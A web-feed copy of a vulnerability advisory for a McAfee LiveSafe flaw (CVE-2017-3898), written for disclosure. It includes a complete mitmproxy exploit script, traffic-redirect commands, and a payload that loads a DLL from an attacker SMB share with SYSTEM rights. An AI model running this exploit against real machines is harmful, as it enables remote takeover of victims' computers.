{"id":9160,"date":"2017-09-07T14:19:40","date_gmt":"2017-09-07T22:19:40","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/07\/news-2933\/"},"modified":"2017-09-07T14:19:40","modified_gmt":"2017-09-07T22:19:40","slug":"news-2933","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/07\/news-2933\/","title":{"rendered":"SSD Advisory \u2013 McAfee LiveSafe MiTM Registry Modification leading to Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Thu, 07 Sep 2017 06:14:58 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a Remote Code Execution vulnerability found in McAfee LiveSafe (MLS) versions prior to 16.0.3. The vulnerability allows network attackers to modify the Windows Registry value associated with the McAfee update via the HTTP backend response.<\/p>\n<p>McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open programs.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security research company, Silent Signal, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address this vulnerability.<\/p>\n<p>For more information: <a href=\"https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714\" target=\"_blank\">https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714<\/a><\/p>\n<p>CVE: CVE-2017-3898<\/p>\n<p><strong>Vulnerabilities Details<\/strong><br \/> An active network attacker can achieve remote code execution in multiple McAfee products. Affected products retrieve configuration data over a plaintext HTTP channel from the <em>http:\/\/COUNTRY.mcafee.com\/apps\/msc\/webupdates\/mscconfig.asp<\/em> URL (where <em>COUNTRY<\/em> is a two-letter country identifier, e.g. 
\u201cuk\u201d).<\/p>\n<p>The response body contains XML formatted data, similar to the following:<\/p>\n<pre><code>&lt;webservice-response response-version=\"1.0\" frequency=\"168\" verid=\"1#1316#15#0#2\"&gt;\n  &lt;update&gt;\n    &lt;reg key=\"HKLM\\SOFTWARE\\McAfee\\MSC\\Settings\\InProductTransaction\" name=\"enable\" type=\"REG_DWORD\" value=\"1\" obfuscate=\"0\"\/&gt;\n  &lt;\/update&gt;\n&lt;\/webservice-response&gt;<\/code><\/pre>\n<p>The response describes a Registry modification using reg tags under the webservice-response\/update path.<\/p>\n<p>This request and the subsequent update are triggered automatically, first upon installation of the software and then after the number of hours indicated by the frequency attribute of the webservice-request node (168 minutes by default).<\/p>\n<p>The update is executed by <em>PlatformServiceFW.dll<\/em> in the <em>McSvHost.exe<\/em> process, which invokes the <em>mcsvrcnt.exe<\/em> program with the <em>\/update<\/em> argument. The <em>McSvHost.exe<\/em> process runs with <em>SYSTEM<\/em> privileges, which are inherited by <em>mcsvrcnt.exe<\/em>, the program that implements the Registry change.<\/p>\n<p>As a result, active network attackers can modify the server responses to write to the Registry of the target with <em>SYSTEM<\/em> privileges.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The exploit runs as a proxy that intercepts and modifies plaintext HTTP requests and responses. 
Since the target software performs certificate validation for HTTPS services, it&#8217;s important to let these connections pass through without modification.<br \/> In regular HTTP proxy mode this can be achieved with the <code>--ignore<\/code> command line parameter of mitmproxy:<\/p>\n<pre><code>mitmproxy -s mcreggeli_inline.py --ignore '.*'<\/code><\/pre>\n<p>In transparent proxy mode the above parameter should not be provided:<\/p>\n<pre><code>mitmproxy -s mcreggeli_inline.py -T<\/code><\/pre>\n<p>For transparent proxy mode the following commands configure NAT and port redirection on common Debian-based Linux distributions (eth0 is the interface visible to the target, eth1 is connected to the internet):<\/p>\n<pre><code>iptables -t nat -A PREROUTING -i eth0 -p tcp \\\n    --dport 80 -j REDIRECT --to 8080\niptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE\nsysctl net.ipv4.ip_forward=1<\/code><\/pre>\n<p>The script looks for the \u201c<em>mscconfig.asp<\/em>\u201d string in the request URL. If it is found, the XML response body is deserialized and new reg nodes are added based on the REG variable declared at the beginning of the script. The REG variable is a list of dictionaries, each dictionary containing the following keys:<\/p>\n<ul>\n<li>Key \u2013 The name of the Registry key to modify (e.g. \u201c<em>HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp<\/em>\u201d; backslashes should be escaped properly for Python)<\/li>\n<li>Type \u2013 Type of the value to create (e.g. \u201c<em>REG_SZ<\/em>\u201d for strings)<\/li>\n<li>Name \u2013 Name of the value to create<\/li>\n<li>Value \u2013 Value to be created<\/li>\n<\/ul>\n<p>The exploit also changes the frequency attribute to 1 so that re-exploitation can be performed sooner (within 1 hour) if needed. 
After the new nodes are inserted, the resulting object is serialized and put in place of the original response body.<\/p>\n<p>To demonstrate code execution, one of the affected McAfee products\u2019 own service entries (<em>mfevtp<\/em> \u2013 McAfee Process Validation Service) was overwritten: the <em>ImagePath<\/em> value of the <em>HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp<\/em> key was replaced to point to the built-in <em>rundll32.exe<\/em> with a <em>UNC<\/em> path argument pointing to the attacker host (the payload, test.dll, was served with Metasploit\u2019s <em>smb_delivery<\/em> module during testing):<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee.jpg\"><img src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-300x56.jpg\" alt=\"\" width=\"300\" height=\"56\" class=\"alignnone size-medium wp-image-3250\" \/><\/a><\/p>\n<p>The REG variable was declared like the following:<\/p>\n<pre><code>REG=[{\"key\":\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\mfevtp\", \"type\":\"REG_SZ\",\"name\":\"ImagePath\", \"value\":\"c:\\\\windows\\\\system32\\\\rundll32.exe \\\\\\\\172.16.205.1\\\\pwn\\\\test.dll,0\"},]<\/code><\/pre>\n<p>In this way, SYSTEM-level command execution is triggered after the machine is restarted; the exploit was not caught by the McAfee software.<\/p>\n<p><u>mcreggeli_inline.py<\/u><\/p>\n<div id=\"crayon-59b1c5fbbaeaf438183868\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; 
margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<pre><code>#!\/usr\/bin\/env python3\n#\n# HTTP proxy mode:\n#   mitmproxy -s mcreggeli_inline.py --ignore '.*'\n#\n# Transparent proxy mode:\n#   mitmproxy -s mcreggeli_inline.py -T --host\n#\n\nfrom mitmproxy import ctx, http\nfrom lxml import etree\n\n# Registry values to inject; backslashes are doubled for Python string literals\nREG=[{\"key\":\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\mfevtp\",\"type\":\"REG_SZ\",\"name\":\"ImagePath\",\"value\":\"c:\\\\windows\\\\system32\\\\rundll32.exe \\\\\\\\172.16.205.1\\\\pwn\\\\test.dll,0\"},]\n\ndef response(flow):\n    # Only touch the plaintext configuration request; HTTPS is left untouched\n    if flow.request.scheme == \"http\" and \"mscconfig.asp\" in flow.request.url:\n        try:\n            oxml=etree.XML(flow.response.content)\n            # Shorten the update interval so the target re-fetches within an hour\n            oxml.set(\"frequency\",\"1\")\n            update=oxml.xpath(\"\/\/webservice-response\/update\")[0]\n            for r in REG:\n                reg=etree.SubElement(update,\"reg\")\n                reg.set(\"key\", r[\"key\"])\n                reg.set(\"type\", r[\"type\"])\n                reg.set(\"obfuscate\", \"0\")\n                reg.set(\"name\", r[\"name\"])\n                reg.set(\"value\", r[\"value\"])\n            #ctx.log(etree.tostring(oxml))\n            flow.response.content=etree.tostring(oxml)\n            ctx.log(\"[+] [MCREGGELI] Payload sent\")\n        except etree.XMLSyntaxError:\n            ctx.log(\"[-] [MCREGGELI] XML deserialization error\")<\/code><\/pre>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-4\">4<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-59b1c5fbbaeaf438183868-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59b1c5fbbaeaf438183868-38\">38<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-1\">#!\/usr\/bin\/env python3<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-2\">#<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-3\"># HTTP proxy mode (plain-HTTP flows only; TLS connections are passed through untouched):<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-4\">#&nbsp;&nbsp; mitmproxy -s mcreggeli_inline.py --ignore '.*'<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-5\">#<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-6\"># Transparent proxy mode:<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-7\">#&nbsp;&nbsp; mitmproxy -s mcreggeli_inline.py -T --host<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-8\">#<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-9\"># (mitmproxy 2.x command line; newer releases spell these options --mode transparent and --ignore-hosts)<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-11\">from mitmproxy import ctx, http<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-12\">from lxml import etree<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-14\"># Registry entries to inject into the plaintext mscconfig.asp response: the mfevtp service&#039;s ImagePath is<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-15\"># pointed at a DLL on an attacker-controlled SMB share (172.16.205.1 is the lab host used in this PoC).<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-16\"># Raw strings keep every backslash literal: as plain strings, \\r and \\t in these paths would become control characters and \\\\ would collapse to a single backslash.<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-17\">REG=[{&quot;key&quot;:r&quot;HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp&quot;,&quot;type&quot;:&quot;REG_SZ&quot;,&quot;name&quot;:&quot;ImagePath&quot;,&quot;value&quot;:r&quot;c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0&quot;},]<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-19\">def response(flow):<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-20\">&nbsp;&nbsp;&nbsp;&nbsp;# Only the plaintext configuration download is rewritten; every other flow is forwarded unchanged<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-21\">&nbsp;&nbsp;&nbsp;&nbsp;if flow.request.scheme == &quot;http&quot; and &quot;mscconfig.asp&quot; in flow.request.url:<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-22\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;try:<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-23\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;oxml=etree.XML(flow.response.content)<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-24\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;oxml.set(&quot;frequency&quot;,&quot;1&quot;)<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-25\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;update=oxml.xpath(&quot;\/\/webservice-response\/update&quot;)[0]<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-26\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;for r in REG:<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-27\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reg=etree.SubElement(update,&quot;reg&quot;)<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-28\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reg.set(&quot;key&quot;, r[&quot;key&quot;])<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-29\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reg.set(&quot;type&quot;, r[&quot;type&quot;])<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-30\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reg.set(&quot;obfuscate&quot;, &quot;0&quot;)<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-31\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reg.set(&quot;name&quot;, r[&quot;name&quot;])<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-32\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;reg.set(&quot;value&quot;, r[&quot;value&quot;])<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-33\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#ctx.log(etree.tostring(oxml))<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-34\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flow.response.content=etree.tostring(oxml)<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-35\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ctx.log(&quot;[+] [MCREGGELI] Payload sent&quot;)<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-36\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;except (etree.XMLSyntaxError, IndexError):<\/div>\n<div class=\"crayon-line\" id=\"crayon-59b1c5fbbaeaf438183868-37\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# malformed XML, or no &lt;update&gt; element to attach the entries to<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59b1c5fbbaeaf438183868-38\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ctx.log(&quot;[-] [MCREGGELI] XML deserialization error&quot;)<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3248\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/06\/McAfee-300x56.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 07 Sep 2017 06:14:58 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a Remote Code Execution vulnerability found in McAfee LiveSafe (MLS) versions prior to 16.0.3. An active network attacker can modify Windows registry values on the host by tampering with the plaintext HTTP backend response that carries the McAfee update configuration. 
McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3248\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 McAfee LiveSafe MiTM Registry Modification leading to Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12270,11682,10757,12136],"class_list":["post-9160","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-man-in-the-middle","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9160","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9160"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9160\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9160"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9160"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9160"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated
":true}]}}